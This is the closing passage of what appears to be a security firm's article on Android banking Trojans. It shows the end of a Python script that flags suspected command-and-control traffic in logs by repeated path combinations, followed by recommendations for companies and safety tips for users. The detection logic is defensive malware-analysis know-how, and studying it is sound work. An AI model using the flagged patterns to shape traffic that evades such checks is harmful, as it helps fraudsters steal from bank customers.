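    return {key: sorted(paths) for key, paths in hits.items() if len(paths) >= min_distinct}


if __name__ == "__main__":
    for (client, host), paths in find_suspects(SAMPLE_LOG).items():
        print(f"{client} -> {host}: {', '.join(paths)}")
```

The host in a real alert would be compared against known indicators such as the control server address given earlier in the article; the path combination alone is the behavioural signal.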

Recommendations

To protect their customers from the threat of mobile Trojans, companies need comprehensive solutions that let them monitor and prevent malicious activity without installing additional software on users' devices.

For this, signature-based methods of detecting mobile Trojans need to be reinforced with technologies that analyse the behaviour of both the customer and the application itself. Protection should also include device identification using digital fingerprinting, which makes it possible to recognise when an account is being used from an atypical device that has already fallen into the hands of a fraudster.

A fundamentally important point is cross-channel analysis, which lets companies manage the risks arising not only on the web but also in the mobile channel, for example in mobile banking applications, in cryptocurrency transactions, and anywhere else transactions can be performed.

Safety rules for users:

  • do not install applications on an Android device from any source other than Google Play, and pay particular attention to the rights an application requests;
  • install Android OS updates regularly;
  • pay attention to the extensions of downloaded files;
  • do not visit suspicious resources;
  • do not click on links received in SMS messages.

Author: Semyon Rogacheva, junior malware analysis specialist at the Group-IB Computer Forensics Laboratory.

Source: www.habr.com
